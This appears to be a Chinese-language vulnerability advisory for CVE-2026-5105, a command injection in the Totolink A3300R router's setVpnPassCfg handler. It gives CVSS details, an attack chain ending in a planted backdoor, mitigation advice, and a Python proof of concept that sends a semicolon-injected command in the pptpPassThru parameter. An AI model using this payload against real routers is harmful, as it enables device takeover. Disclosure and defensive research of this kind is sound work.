CVE-2026-5105 CVSS 6.3 中危

CVE-2026-5105: Totolink A3300R 命令注入漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5105

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3300R

漏洞概述

Totolink A3300R路由器固件版本17.0.0cu.557_b20221024存在命令注入漏洞。攻击者利用/cgi-bin/cstecgi.cgi中setVpnPassCfg函数的参数过滤缺陷，通过构造恶意pptpPassThru参数，在低权限认证后远程执行任意系统命令，从而控制设备。

技术细节

该漏洞位于Totolink A3300R的Web管理接口组件中。受影响的文件为/cgi-bin/cstecgi.cgi，其中的setVpnPassCfg函数用于处理VPN相关的配置参数。在处理pptpPassThru参数时，后端代码未对用户输入进行严格的边界检查或安全过滤，直接将参数值拼接到系统Shell命令中执行。由于CVSS评分显示攻击复杂度低且需低权限（PR:L），攻击者在获取基本访问权限后，可发送特制的HTTP POST请求，利用Shell元字符（如;或|）拼接恶意命令。服务器端解析并执行这些命令后，攻击者即可获取服务器权限，导致机密性、完整性和可用性受损。

攻击链分析

STEP 1

侦察

攻击者识别出目标为Totolink A3300R路由器，并确认其Web管理接口开放。

STEP 2

认证

攻击者获取低权限用户凭证（默认密码或弱口令），满足CVSS中的PR:L要求。

STEP 3

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送POST请求，调用setVpnPassCfg函数，并在pptpPassThru参数中注入恶意Shell命令。

STEP 4

命令执行

服务器端未过滤输入，直接执行注入的命令，攻击者获得设备控制权。

STEP 5

建立后门

攻击者利用执行权限开启Telnet服务或上传后门程序，维持持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target settings
target_url = "http://192.168.1.1/cgi-bin/cstecgi.cgi"

# Vulnerable payload: Command injection using semicolon
# Example payload to ping a controlled server to verify blind RCE
payload = "; ping -c 4 192.168.1.100"

# Headers (Cookie might be needed for PR:L requirement)
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "uid=123456" # Placeholder for authenticated session
}

# Data payload targeting the vulnerable function and parameter
data = {
    "function": "setVpnPassCfg",
    "pptpPassThru": payload
}

try:
    response = requests.post(target_url, headers=headers, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施

建议立即检查设备固件版本，若受影响应尽快升级。在无法立即升级的情况下，建议禁用路由器的远程Web管理功能，仅允许内网特定IP访问，并密切监控设备异常流量和日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5105
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5105
3 Details https://www.cvedetails.com/cve/CVE-2026-5105/
4 VulDB https://vuldb.com/cve/CVE-2026-5105
5 Link https://github.com/LvHongW/Vuln-of-totolink_A3300R/tree/main/A3300R_pptpPassThru_cmd_inject
6 Link https://vuldb.com/submit/779143
7 Link https://vuldb.com/vuln/354130
8 Link https://vuldb.com/vuln/354130/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表